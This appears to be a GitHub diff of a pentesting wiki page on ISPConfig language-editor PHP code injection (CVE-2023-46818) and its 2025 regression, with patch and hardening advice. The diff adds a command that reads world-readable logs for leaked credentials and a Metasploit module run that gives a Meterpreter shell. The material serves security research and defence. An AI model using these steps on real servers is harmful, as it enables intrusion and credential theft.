You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
76
76
77
+
### 2025 regression (ISPConfig 3.3.0 / 3.3.0p1)
78
+
79
+
The language editor bug resurfaced in 3.3.0/3.3.0p1 and was fixed in **3.3.0p2**. Preconditions are unchanged (`admin_allow_langedit` and admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.
80
+
81
+
**Notes:**
82
+
- On 3.3.0/3.3.0p1, world-readable rotated logs under `/usr/local/ispconfig/interface/log/` may leak credentials if debug logging was enabled:
83
+
84
+
```bash
85
+
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
86
+
```
87
+
- Exploit steps match CVE-2023-46818; 3.3.0p2 adds extra checks before language editing.
88
+
77
89
### Python PoC
78
90
79
91
A ready-to-use exploit automates token handling and payload delivery:
Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`, which can auto-enable `admin_allow_langedit` if the supplied admin account has system-config rights.
103
+
104
+
```text
105
+
use exploit/linux/http/ispconfig_lang_edit_php_code_injection
106
+
set RHOSTS 10.10.10.50
107
+
set RPORT 8080
108
+
set USERNAME admin
109
+
set PASSWORD <admin_pass>
110
+
set TARGETURI /
111
+
run
112
+
```
113
+
114
+
The module writes a base64-encoded payload through `records[]` and executes it, giving a PHP Meterpreter or custom payload.
115
+
88
116
### Hardening
89
117
90
-
- Upgrade to 3.2.11p1 or later
118
+
- Upgrade to **3.2.11p1** or later for the original issue, and to **3.3.0p2** or later for the 2025 regression.
91
119
- Disable the language editor unless strictly needed:
0 commit comments